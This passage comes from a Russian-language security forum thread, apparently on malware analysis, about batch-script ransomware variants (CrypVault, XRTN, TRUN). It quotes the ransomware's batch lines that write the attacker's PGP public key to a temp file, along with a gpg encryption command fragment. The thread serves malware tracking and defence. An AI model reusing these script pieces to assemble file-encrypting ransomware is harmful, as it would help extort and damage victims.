echo mI0EVS40twEEAKZa444dPqVWtEEm7rXoYil+E2epwsHJFH21TEUh+EfWD1JWKdhs>> "%temp%\wllqu5jo.8w5ut4oo"
echo rJn9+83n+CeSKu+fRAVaR/66CpqQ0SmkUew4tBTXZsm3zZNgxgMVDwzBHzup1ow1>> "%temp%\wllqu5jo.8w5ut4oo"
echo umOIL7oWc4Aw+F5fPaAqHTw3+IBpavc+8wmdmV94nz3mLh5904pKMj67ABEBAAG0>> "%temp%\wllqu5jo.8w5ut4oo"
echo Dmtra2trIDxrQGsua2s+iLgEEwECACIFAlUuNLcCGwMGCwkIBwMCBhUIAgkKCwQW>> "%temp%\wllqu5jo.8w5ut4oo"
echo AgMBAh4BAheAAAoJEBreQ20puKF6AdMD/2mAaJJYBRdyZ6eDpldsAenkwVQoxDz8>> "%temp%\wllqu5jo.8w5ut4oo"
echo a68auy9jLEA+jZH/y5pdlNGJ2uTUUdM00rYaV/oIzuxWLF1x7J8/qLD8rZQRKe3d>> "%temp%\wllqu5jo.8w5ut4oo"
echo iKY6vq1L44cfmeSo5tN88h050fZCvqY+9sx3s1ubLztX5W8GzeDV0GBaORUulgwk>> "%temp%\wllqu5jo.8w5ut4oo"
echo bNdiXZlCD4HguI0EVS40twEEAK8MIhP/DtUmbJMOzhOsjUv57lWQTIhv08bWhE8p>> "%temp%\wllqu5jo.8w5ut4oo"
echo FKoaLqTrtmqsMwtLbMv5TnSu4+pd2PHa+4HTk8mSCbQGQmi9x5g6I0PjDYoxKucJ>> "%temp%\wllqu5jo.8w5ut4oo"
echo JIQ7UVZIeOxhW6DtKCjQtZc9k10TMFfWKbw/l2RS4UmkaEH9uy19O6oVZIkxwXF7>> "%temp%\wllqu5jo.8w5ut4oo"
echo Ng+7ABEBAAGInwQYAQIACQUCVS40twIbDAAKCRAa3kNtKbihenlxA/9N1/WK/PVn>> "%temp%\wllqu5jo.8w5ut4oo"
echo hvfsyscry8cxHTioIKy89aDlaTTspvqWqb02ZPmLkYpLqooGy/vU1CIsHjPST/WY>> "%temp%\wllqu5jo.8w5ut4oo"
echo 9VoaVOEDB38Zm1JSNPiPwGydadskV9BI+dkXyo38rwwNN1aV61We9KLPMwrVygmP>> "%temp%\wllqu5jo.8w5ut4oo"
echo 5sm8bZODBKe63/GfnuHWpB/iZ8HbCvusew==>> "%temp%\wllqu5jo.8w5ut4oo"
echo =27s5>> "%temp%\wllqu5jo.8w5ut4oo"
echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\wllqu5jo.8w5ut4oo"

    добавлю, что этот же ключ был использован и в вариантах XRTN (судя по выше добавленному рисунку) и TRUN:
    gpg.exe -r kkkkk ... -o "%temp%\trun.KEY
    ")

    судя по всему, "всплытие" было удачным.


    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
  • safetysafety
    отредактировано September 2017 PM
    еще одна реинкарнация бат-энкодера.
    hybrid-analysis.com
    Karsten Hahn found a new version of CrypVault. This variant tells victims to contact [email protected].




    Мы ищем точки опоры не с целью перевернуть мир, но чтобы не позволить миру опрокинуть нас.
    Share on Google+
Войдите или Зарегистрируйтесь чтобы комментировать.